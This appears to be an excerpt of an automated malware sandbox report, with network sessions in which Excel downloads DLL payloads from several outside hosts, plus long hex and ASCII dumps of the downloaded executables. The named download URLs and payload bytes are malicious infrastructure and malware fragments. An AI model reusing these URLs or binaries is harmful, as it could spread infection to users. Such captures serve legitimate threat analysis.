                                                                                      May 23, 2022 09:00:00.677397966 CEST382INData Raw: 00 48 6a 1a be c7 85 ac 01 00 00 1d 09 f2 15 c7 85 b0 01 00 00 24 62 72 42 c7 85 b4 01 00 00 44 55 2e be c7 85 b8 01 00 00 11 7d 72 2c c7 85 bc 01 00 00 c8 b8 0a dd c7 85 c0 01 00 00 7f 74 19 7d c7 85 c4 01 00 00 dc 45 92 32 c7 85 c8 01 00 00 71
                                                                                      Data Ascii: Hj$brBDU.}r,t}E2qwaqBV3mqBdB2erquHD"m r\)9QH#fa
                                                                                      May 23, 2022 09:00:00.677419901 CEST384INData Raw: 03 00 00 52 08 de 23 c7 85 c4 03 00 00 3b 00 5a 98 c7 85 c8 03 00 00 e7 3b 6e 00 c7 85 cc 03 00 00 64 3f 53 68 c7 85 d0 03 00 00 bd 59 4d 41 c7 85 d4 03 00 00 b5 07 7a 9b c7 85 d8 03 00 00 14 ed 0d d2 c7 85 dc 03 00 00 9d 92 62 1c c7 85 e0 03 00
                                                                                      Data Ascii: R#;Z;nd?ShYMAzboNP&Bwx(V<Wm7 {+_TB;{<mi\Rm{.~:GwB6Z<
                                                                                      May 23, 2022 09:00:00.677443981 CEST385INData Raw: 85 d8 05 00 00 c9 94 d8 7a c7 85 dc 05 00 00 4f 74 6a ce c7 85 e0 05 00 00 37 64 0b 62 c7 85 e4 05 00 00 96 2e be 49 c7 85 e8 05 00 00 5a 1b e6 f5 c7 85 ec 05 00 00 24 83 be 23 c7 85 f0 05 00 00 5f 9e f5 ba c7 85 f4 05 00 00 11 24 36 79 c7 85 f8
                                                                                      Data Ascii: zOtj7db.IZ$#_$6y tzf;oYhAHCsHVrV$4m%x N{4$*I(Sm7(,{P0)5^4>vBA8
                                                                                      May 23, 2022 09:00:00.677468061 CEST387INData Raw: 4e c7 85 f0 07 00 00 09 56 95 7f c7 85 f4 07 00 00 46 a2 1e 54 c7 85 f8 07 00 00 31 18 1e 1f c7 85 fc 07 00 00 b8 47 61 b0 c7 85 00 08 00 00 83 79 4a 33 c7 85 04 08 00 00 4d f6 97 55 c7 85 08 08 00 00 e1 ae 76 1a c7 85 0c 08 00 00 ee f5 6e 0b c7
                                                                                      Data Ascii: NVFT1GayJ3MUvn*8@Kw}] P$$x(lH,#fa03wa4y4s8H`<h@HJD;Hj!Lj6Q
                                                                                      May 23, 2022 09:00:00.677491903 CEST388INData Raw: db 7c 27 c7 85 08 0a 00 00 1e b8 54 0c c7 85 0c 0a 00 00 55 51 00 42 c7 85 10 0a 00 00 fc b3 09 de c7 85 14 0a 00 00 36 2b 09 d2 c7 85 18 0a 00 00 18 7d 7a e7 c7 85 1c 0a 00 00 03 66 7e d5 c7 85 20 0a 00 00 e9 3a d5 b4 c7 85 24 0a 00 00 42 77 42
                                                                                      Data Ascii: |'TUQB6+}zf~ :$BwB(Zvr,1-0_4Y:.8f5<U3@EYDCH7taLxPT1xX{HJ\&`Pdzx4
                                                                                      May 23, 2022 09:00:00.677517891 CEST390INData Raw: ff 48 8d 15 6c 3d 01 00 48 8b ce e8 3c dd ff ff b2 0a 48 8b c8 48 8b d8 e8 4f df ff ff 48 8b cb e8 cf db ff ff 48 8d 15 68 3d 01 00 48 8b ce e8 18 dd ff ff b2 0a 48 8b c8 48 8b d8 e8 2b df ff ff 48 8b cb e8 ab db ff ff 48 8d 15 64 3d 01 00 48 8b
                                                                                      Data Ascii: Hl=H<HHOHHh=HHH+HHd=HHHHH`=HHHHcH\=HHHH?HX=HHHHHT=HdHHw
                                                                                      May 23, 2022 09:00:00.792331934 CEST391INData Raw: 01 00 48 8b ce e8 08 d8 ff ff b2 0a 48 8b c8 48 8b d8 e8 1b da ff ff 48 8b cb e8 9b d6 ff ff 48 8d 15 d4 3c 01 00 48 8b ce e8 e4 d7 ff ff b2 0a 48 8b c8 48 8b d8 e8 f7 d9 ff ff 48 8b cb e8 77 d6 ff ff 48 8d 15 d0 3c 01 00 48 8b ce e8 c0 d7 ff ff
                                                                                      Data Ascii: HHHHH<HHHHwH<HHHHSH<HHHH/H<HxHHHH<HTHHgHH<H0HHCH


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.2249178138.219.41.21080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 23, 2022 09:00:54.759550095 CEST846OUTGET /aaabackupsqldb/11hYk3bHJ/ HTTP/1.1
                                                                                      Accept: */*
                                                                                      UA-CPU: AMD64
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: jr-software-web.net
                                                                                      Connection: Keep-Alive
                                                                                      May 23, 2022 09:00:55.038351059 CEST847INHTTP/1.1 200 OK
                                                                                      Cache-Control: private
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/x-msdownload
                                                                                      Expires: Mon, 23 May 2022 07:00:53 GMT
                                                                                      Last-Modified: Mon, 23 May 2022 07:00:53 GMT
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      Set-Cookie: 628b312600786=1653289253; expires=Mon, 23-May-2022 07:01:53 GMT; Max-Age=60; path=/
                                                                                      Content-Disposition: attachment; filename="LjSKxP.dll"
                                                                                      Content-Transfer-Encoding: binary
                                                                                      X-Powered-By: ASP.NET
                                                                                      Date: Mon, 23 May 2022 07:00:53 GMT
                                                                                      Content-Length: 365056
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b" 5T@P .text `.rdataT @@.data7@.pdata@@.rsrc@@.reloc@B
                                                                                      May 23, 2022 09:00:55.042227983 CEST849INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: H\$Hl$Ht$WH0IHHE3LAQ\$(Ht$ 3HH
                                                                                      May 23, 2022 09:00:55.042257071 CEST850INData Raw: 08 b5 23 5c 56 c7 45 0c 16 22 0e 75 c7 45 10 b1 1b 41 77 c7 45 14 59 50 0a 07 c7 45 18 ac 22 ed 77 c7 45 1c 13 56 21 fe c7 45 20 2e a7 1d 61 c7 45 24 22 61 ac 2f c7 45 28 ce 3a 53 39 c7 45 2c 54 10 a1 05 c7 45 30 b0 3c 0d ae c7 45 34 1d b8 6d 03
                                                                                      Data Ascii: #\VE"uEAwEYPE"wEV!E .aE$"a/E(:S9E,TE0<E4mE8_oE<2E@FED;EH7EL-EPqETT] EX,E\oaE`XBEdEh9';ElEp-m9Et,>MExo'E|#Y7p0"
                                                                                      May 23, 2022 09:00:55.042273998 CEST851INData Raw: c7 85 44 02 00 00 13 28 37 ab c7 85 48 02 00 00 70 c2 20 50 c7 85 4c 02 00 00 35 e2 1b ee c7 85 50 02 00 00 82 36 43 10 c7 85 54 02 00 00 26 0c 20 09 c7 85 58 02 00 00 f3 32 7b 09 c7 85 5c 02 00 00 65 50 4f 0a c7 85 60 02 00 00 a3 2f 43 15 c7 85
                                                                                      Data Ascii: D(7Hp PL5P6CT& X2{\ePO`/CdTG0h}WLltuOp:Yt(2Bx<v:|X-n'qRc;qdf/.GpRh78<-'C
                                                                                      May 23, 2022 09:00:55.307456017 CEST853INData Raw: b6 f3 c7 85 5c 04 00 00 ff f7 43 62 c7 85 60 04 00 00 34 32 d2 17 c7 85 64 04 00 00 c8 71 3f 12 c7 85 68 04 00 00 34 e6 25 9a c7 85 6c 04 00 00 d6 aa 6c d8 c7 85 70 04 00 00 73 94 6f 4b c7 85 74 04 00 00 f0 c5 f2 23 c7 85 78 04 00 00 69 96 00 b1
                                                                                      Data Ascii: \Cb`42dq?h4%llpsoKt#xi|>l|%c$mH*.\tG5qj'EBgx+av}~#i~e9[+hAX
                                                                                      May 23, 2022 09:00:55.307523966 CEST854INData Raw: 64 9c 96 24 c7 85 74 06 00 00 22 b8 61 56 c7 85 78 06 00 00 ef 23 a6 64 c7 85 7c 06 00 00 80 0f ba 3f c7 85 80 06 00 00 e2 4e 09 33 c7 85 84 06 00 00 5d 3d fe 27 c7 85 88 06 00 00 4f 35 5b f1 c7 85 8c 06 00 00 28 d3 11 3b c7 85 90 06 00 00 2e a3
                                                                                      Data Ascii: d$t"aVx#d|?N3]='O5[(;.,:'U@et%</LIOf^e7Eekg$U9#(=QM1v^yicl
                                                                                      May 23, 2022 09:00:55.312773943 CEST856INData Raw: 00 00 6d 1b 4b f8 c7 85 8c 08 00 00 a6 61 81 bf c7 85 90 08 00 00 05 3f 9f 3c c7 85 94 08 00 00 4a 9d 15 28 c7 85 98 08 00 00 aa c1 2b cd c7 85 9c 08 00 00 f8 13 79 d4 c7 85 a0 08 00 00 a5 40 70 07 c7 85 a4 08 00 00 b8 33 7a 8d c7 85 a8 08 00 00
                                                                                      Data Ascii: mKa?<J(+y@p3zmm7jue75@ } z$*JZxng@$P+ong"t4vCwjf
                                                                                      May 23, 2022 09:00:55.312836885 CEST857INData Raw: 00 28 d3 1a 37 c7 85 a0 0a 00 00 26 29 a0 c3 c7 85 a4 0a 00 00 2e f7 13 52 c7 85 a8 0a 00 00 ac de 74 70 c7 85 ac 0a 00 00 f5 39 e1 3a c7 85 b0 0a 00 00 7c 65 3a ec c7 85 b4 0a 00 00 0c 4e 4b 0b c7 85 b8 0a 00 00 e1 f0 66 00 c6 85 bc 0a 00 00 a6
                                                                                      Data Ascii: (7&).Rtp9:|e:NKf3HuHBE3E3FH$A@A0H$L$HHHt3AH-H3LL$ LT$!HH
                                                                                      May 23, 2022 09:00:55.323580027 CEST858INData Raw: ec 01 00 48 89 05 9c b3 02 00 e8 77 52 00 00 48 89 05 d8 8f 02 00 e8 3b 42 00 00 85 c0 7d 11 e8 f2 09 00 00 e8 bd 54 00 00 33 c0 e9 5c 01 00 00 e8 21 4c 00 00 85 c0 7c 14 e8 b8 49 00 00 85 c0 7c 0b 33 c9 e8 ad 3b 00 00 85 c0 74 16 e8 c4 48 00 00
                                                                                      Data Ascii: HwRH;B}T3\!L|I|3;tHT3)Y;sk|$XuY=X~DPH=]u<eH`+TH|$`u={{tD3|$XFD$
                                                                                      May 23, 2022 09:00:55.323627949 CEST860INData Raw: 01 00 00 8b 44 24 30 48 6b c0 10 48 8b 8c 24 88 00 00 00 8b 44 01 04 48 39 44 24 68 0f 82 92 01 00 00 8b 44 24 30 48 6b c0 10 48 8b 8c 24 88 00 00 00 8b 44 01 08 48 39 44 24 68 0f 83 73 01 00 00 8b 44 24 30 48 6b c0 10 48 8b 8c 24 88 00 00 00 83
                                                                                      Data Ascii: D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|uD$H3D$0HkH$DHD$xHD$pH$HL$8T$pD$H|$H}3|$HH$8csmu-H=>t#H>8U
                                                                                      May 23, 2022 09:00:55.323657990 CEST861INData Raw: 8b 44 24 30 c7 40 1c 01 00 00 00 48 8b 44 24 30 c7 80 c8 00 00 00 01 00 00 00 48 8b 44 24 30 c6 80 74 01 00 00 43 48 8b 44 24 30 c6 80 f7 01 00 00 43 48 8b 44 24 30 48 8d 0d 94 78 02 00 48 89 88 b8 00 00 00 b9 0d 00 00 00 e8 53 54 00 00 90 48 8b
                                                                                      Data Ascii: D$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/THD$0HL$8HHD$0HuHD$0H"xHHD$0HzT?TH(HHD$0pfHD$8H


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249173212.98.224.29443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2022-05-23 06:59:57 UTC0OUTGET /catalog/controller/account/dqfKI/ HTTP/1.1
                                                                                      Accept: */*
                                                                                      UA-CPU: AMD64
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: www.melisetotoaksesuar.com
                                                                                      Connection: Keep-Alive
                                                                                      2022-05-23 06:59:57 UTC0INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Mon, 23 May 2022 06:59:57 GMT
                                                                                      Content-Type: application/x-msdownload
                                                                                      Content-Length: 365056
                                                                                      Connection: close
                                                                                      X-Powered-By: PHP/5.6.40
                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      Expires: Mon, 23 May 2022 06:59:57 GMT
                                                                                      Content-Disposition: attachment; filename="CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK.dll"
                                                                                      Content-Transfer-Encoding: binary
                                                                                      Set-Cookie: 628b30ed14255=1653289197; expires=Mon, 23-May-2022 07:00:57 GMT; Max-Age=60; path=/
                                                                                      Last-Modified: Mon, 23 May 2022 06:59:57 GMT
                                                                                      X-Cache-Status: MISS
                                                                                      X-Powered-By: PleskLin
                                                                                      2022-05-23 06:59:57 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b"
                                                                                      2022-05-23 06:59:57 UTC16INData Raw: 68 44 8b 44 24 60 48 8b 54 24 58 48 8b 4c 24 50 e8 05 ff ff ff 48 89 44 24 38 48 83 7c 24 38 00 75 1c 83 7c 24 30 00 74 15 e8 4c 61 00 00 48 85 c0 74 0b e8 42 61 00 00 8b 4c 24 30 89 08 48 8b 44 24 38 48 83 c4 48 c3 cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 48 b9 04 00 00 00 e8 de 48 00 00 90 c7 44 24 28 01 00 00 00 8b 44 24 70 89 44 24 20 4c 8b 4c 24 68 44 8b 44 24 60 48 8d 54 24 58 48 8b 4c 24 50 e8 24 00 00 00 48 89 44 24 30 b9 04 00 00 00 e8 05 49 00 00 48 8b 44 24 30 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec 88 00 00 00 c7 44 24 48 00 00 00 00 48 8b 84 24 98 00 00 00 48 8b 00 48 89 44 24 40 48 83 bc 24 90 00 00 00 00 75 26 44 8b 8c 24 b0 00 00
                                                                                      Data Ascii: hDD$`HT$XHL$PHD$8H|$8u|$0tLaHtBaL$0HD$8HHLL$ DD$HT$HL$HHHD$(D$pD$ LL$hDD$`HT$XHL$P$HD$0IHD$0HHLL$ DD$HT$HL$HD$HH$HHD$@H$u&D$
                                                                                      2022-05-23 06:59:57 UTC32INData Raw: ff ff ff ff ff 00 00 48 8b 4c 24 28 48 23 c8 48 8b c1 48 89 44 24 28 48 b8 32 a2 df 2d 99 2b 00 00 48 39 44 24 28 75 0f 48 b8 33 a2 df 2d 99 2b 00 00 48 89 44 24 28 48 8b 44 24 28 48 89 05 1f 26 02 00 48 8b 44 24 28 48 f7 d0 48 89 05 18 26 02 00 48 83 c4 48 c3 cc cc cc 48 89 54 24 10 89 4c 24 08 48 83 ec 28 81 7c 24 30 63 73 6d e0 75 12 48 8b 54 24 38 8b 4c 24 30 e8 0b 00 00 00 eb 04 eb 02 33 c0 48 83 c4 28 c3 48 89 54 24 10 89 4c 24 08 48 83 ec 58 e8 de b4 ff ff 48 89 44 24 28 48 83 7c 24 28 00 75 07 33 c0 e9 73 02 00 00 48 8b 44 24 28 48 8b 90 a0 00 00 00 8b 4c 24 60 e8 65 02 00 00 48 89 44 24 20 48 83 7c 24 20 00 75 0b 48 c7 44 24 40 00 00 00 00 eb 0e 48 8b 44 24 20 48 8b 40 08 48 89 44 24 40 48 83 7c 24 40 00 75 07 33 c0 e9 29 02 00 00 48 83 7c 24 40
                                                                                      Data Ascii: HL$(H#HHD$(H2-+H9D$(uH3-+HD$(HD$(H&HD$(HH&HHHT$L$H(|$0csmuHT$8L$03H(HT$L$HXHD$(H|$(u3sHD$(HL$`eHD$ H|$ uHD$@HD$ H@HD$@H|$@u3)H|$@
                                                                                      2022-05-23 06:59:57 UTC48INData Raw: ff ff 48 89 44 24 30 48 8b 4c 24 30 ff 15 e0 56 01 00 48 89 05 a1 1d 02 00 48 8b 05 9a 1d 02 00 48 89 05 8b 1d 02 00 48 83 7c 24 30 00 75 07 b8 18 00 00 00 eb 0e 48 8b 44 24 30 48 c7 00 00 00 00 00 33 c0 48 83 c4 48 c3 cc 48 83 ec 38 c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 48 63 44 24 20 48 83 f8 0a 73 28 48 63 44 24 20 48 8d 0d c1 f3 01 00 48 8b 0c c1 ff 15 6f 56 01 00 48 63 4c 24 20 48 8d 15 ab f3 01 00 48 89 04 ca eb c3 48 83 c4 38 c3 48 83 ec 28 b9 03 00 00 00 e8 22 62 00 00 83 f8 01 74 17 b9 03 00 00 00 e8 13 62 00 00 85 c0 75 1d 83 3d 70 f9 01 00 01 75 14 b9 fc 00 00 00 e8 7c 00 00 00 b9 ff 00 00 00 e8 72 00 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 18 c7 04 24 00 00 00 00 eb 08 8b 04 24 ff
                                                                                      Data Ascii: HD$0HL$0VHHHH|$0uHD$0H3HHH8D$ D$ D$ HcD$ Hs(HcD$ HHoVHcL$ HHH8H("btbu=pu|rH(L$H$$
                                                                                      2022-05-23 06:59:57 UTC64INData Raw: c1 ff 15 63 17 01 00 89 84 24 d0 80 00 00 83 bc 24 d0 80 00 00 02 74 02 eb 6b 48 8d 8c 24 60 10 00 00 e8 13 0c 00 00 48 63 8c 24 10 81 00 00 48 8d 15 24 b5 01 00 48 89 94 24 d8 80 00 00 48 c7 44 24 20 00 00 00 00 4c 8d 8c 24 a4 70 00 00 44 8b c0 48 8d 94 24 60 10 00 00 48 8b 84 24 d8 80 00 00 48 8b 0c c8 ff 15 fe 17 01 00 85 c0 74 05 e9 53 01 00 00 ff 15 9f 16 01 00 83 f8 06 74 05 e9 43 01 00 00 48 c7 84 24 b0 80 00 00 00 00 00 00 48 c7 44 24 20 ff ff ff ff 4c 8d 8c 24 60 10 00 00 41 b8 00 10 00 00 48 8d 94 24 b0 70 00 00 48 8d 8c 24 b0 80 00 00 e8 8d 78 00 00 48 c7 44 24 38 00 00 00 00 c7 44 24 30 7b 02 00 00 48 8d 0d 15 57 01 00 48 89 4c 24 28 48 8d 0d 09 63 01 00 48 89 4c 24 20 4c 8d 0d ed 5c 01 00 41 b8 22 00 00 00 ba 16 00 00 00 8b c8 e8 eb 63 ff ff
                                                                                      Data Ascii: c$$tkH$`Hc$H$H$HD$ L$pDH$`H$HtStCH$HD$ L$`AH$pH$xHD$8D$0{HWHL$(HcHL$ L\A"c
                                                                                      2022-05-23 06:59:57 UTC80INData Raw: 70 48 39 81 e0 00 00 00 74 73 48 8b 84 24 b0 00 00 00 81 38 4d 4f 43 e0 74 63 48 8b 84 24 b0 00 00 00 81 38 52 43 43 e0 74 53 48 8b 84 24 e8 00 00 00 48 89 44 24 30 8b 84 24 e0 00 00 00 89 44 24 28 48 8b 84 24 d0 00 00 00 48 89 44 24 20 4c 8b 8c 24 c8 00 00 00 4c 8b 84 24 c0 00 00 00 48 8b 94 24 b8 00 00 00 48 8b 8c 24 b0 00 00 00 e8 86 9f ff ff 85 c0 74 05 e9 93 02 00 00 48 8b 84 24 d0 00 00 00 83 78 0c 00 74 02 eb 05 e8 38 85 ff ff 48 8b 84 24 c8 00 00 00 48 89 44 24 30 48 8d 44 24 6c 48 89 44 24 28 48 8d 44 24 68 48 89 44 24 20 44 8b 8c 24 d8 00 00 00 44 8b 84 24 e0 00 00 00 48 8b 94 24 d0 00 00 00 48 8b 8c 24 b8 00 00 00 e8 a2 9f ff ff 48 89 44 24 60 eb 18 8b 44 24 68 ff c0 89 44 24 68 48 8b 44 24 60 48 83 c0 14 48 89 44 24 60 8b 44 24 6c 39 44 24 68
                                                                                      Data Ascii: pH9tsH$8MOCtcH$8RCCtSH$HD$0$D$(H$HD$ L$L$H$H$tH$xt8H$HD$0HD$lHD$(HD$hHD$ D$D$H$H$HD$`D$hD$hHD$`HHD$`D$l9D$h
                                                                                      2022-05-23 06:59:57 UTC96INData Raw: 20 4c 8b 8c 24 a8 00 00 00 4c 8b 84 24 98 00 00 00 48 8b 94 24 90 00 00 00 48 8d 0d 5a 4e 00 00 e8 75 f9 ff ff 89 44 24 30 33 c0 48 8b 8c 24 90 00 00 00 48 8b 94 24 98 00 00 00 66 89 44 51 fe 83 7c 24 30 fe 75 2a 48 83 bc 24 a0 00 00 00 ff 75 1f e8 23 21 ff ff 83 38 22 75 0b e8 19 21 ff ff 8b 4c 24 34 89 08 b8 ff ff ff ff e9 00 02 00 00 83 7c 24 30 00 0f 8d 33 01 00 00 33 c0 48 8b 8c 24 90 00 00 00 66 89 01 48 83 bc 24 98 00 00 00 ff 74 6c 48 81 bc 24 98 00 00 00 ff ff ff 7f 74 5e 48 83 bc 24 98 00 00 00 01 76 53 48 8b 84 24 98 00 00 00 48 ff c8 48 39 05 cb 25 01 00 73 0e 48 8b 05 c2 25 01 00 48 89 44 24 58 eb 10 48 8b 84 24 98 00 00 00 48 ff c8 48 89 44 24 58 48 8b 44 24 58 48 d1 e0 48 8b 8c 24 90 00 00 00 48 83 c1 02 4c 8b c0 ba fe 00 00 00 e8 fa a7 fe
                                                                                      Data Ascii: L$L$H$HZNuD$03H$H$fDQ|$0u*H$u#!8"u!L$4|$033H$fH$tlH$t^H$vSH$HH9%sH%HD$XH$HHD$XHD$XHH$HL
                                                                                      2022-05-23 06:59:57 UTC112INData Raw: 40 0f b6 8c 24 30 03 00 00 88 08 48 8b 44 24 40 48 ff c8 48 89 44 24 40 e9 42 ff ff ff 48 8d 84 24 af 02 00 00 48 2b 44 24 40 89 44 24 68 48 8b 44 24 40 48 ff c0 48 89 44 24 40 8b 44 24 50 25 00 02 00 00 85 c0 74 33 83 7c 24 68 00 74 0d 48 8b 44 24 40 0f be 00 83 f8 30 74 1f 48 8b 44 24 40 48 ff c8 48 89 44 24 40 48 8b 44 24 40 c6 00 30 8b 44 24 68 ff c0 89 44 24 68 83 7c 24 6c 00 0f 85 32 02 00 00 8b 44 24 50 83 e0 40 85 c0 74 4e 8b 44 24 50 25 00 01 00 00 85 c0 74 0f c6 44 24 54 2d c7 44 24 5c 01 00 00 00 eb 32 8b 44 24 50 83 e0 01 85 c0 74 0f c6 44 24 54 2b c7 44 24 5c 01 00 00 00 eb 18 8b 44 24 50 83 e0 02 85 c0 74 0d c6 44 24 54 20 c7 44 24 5c 01 00 00 00 8b 44 24 68 8b 4c 24 58 2b c8 8b c1 2b 44 24 5c 89 84 24 48 03 00 00 8b 44 24 50 83 e0 0c 85 c0
                                                                                      Data Ascii: @$0HD$@HHD$@BH$H+D$@D$hHD$@HHD$@D$P%t3|$htHD$@0tHD$@HHD$@HD$@0D$hD$h|$l2D$P@tND$P%tD$T-D$\2D$PtD$T+D$\D$PtD$T D$\D$hL$X++D$\$HD$P
                                                                                      2022-05-23 06:59:57 UTC128INData Raw: 30 00 75 02 eb 52 e8 9f a1 fe ff 8b 4c 24 30 89 08 e8 64 a1 fe ff c7 00 09 00 00 00 c7 44 24 30 ff ff ff ff 33 c0 85 c0 75 2e 48 8d 05 f9 74 00 00 48 89 44 24 20 45 33 c9 41 b8 45 00 00 00 48 8d 15 64 80 00 00 b9 02 00 00 00 e8 aa a9 fe ff 83 f8 01 75 03 cc 33 c0 8b 4c 24 60 e8 a9 f1 ff ff 8b 44 24 30 48 83 c4 58 c3 89 4c 24 08 48 83 ec 58 48 63 44 24 60 48 83 f8 fe 75 20 e8 28 a1 fe ff c7 00 00 00 00 00 e8 ed a0 fe ff c7 00 09 00 00 00 b8 ff ff ff ff e9 1a 02 00 00 83 7c 24 60 00 7c 16 8b 05 e4 da 00 00 39 44 24 60 73 0a c7 44 24 3c 01 00 00 00 eb 08 c7 44 24 3c 00 00 00 00 8b 44 24 3c 89 44 24 34 83 7c 24 34 00 75 2e 48 8d 05 a2 75 00 00 48 89 44 24 20 45 33 c9 41 b8 2e 00 00 00 48 8d 15 ed 89 00 00 b9 02 00 00 00 e8 03 a9 fe ff 83 f8 01 75 03 cc 33 c0
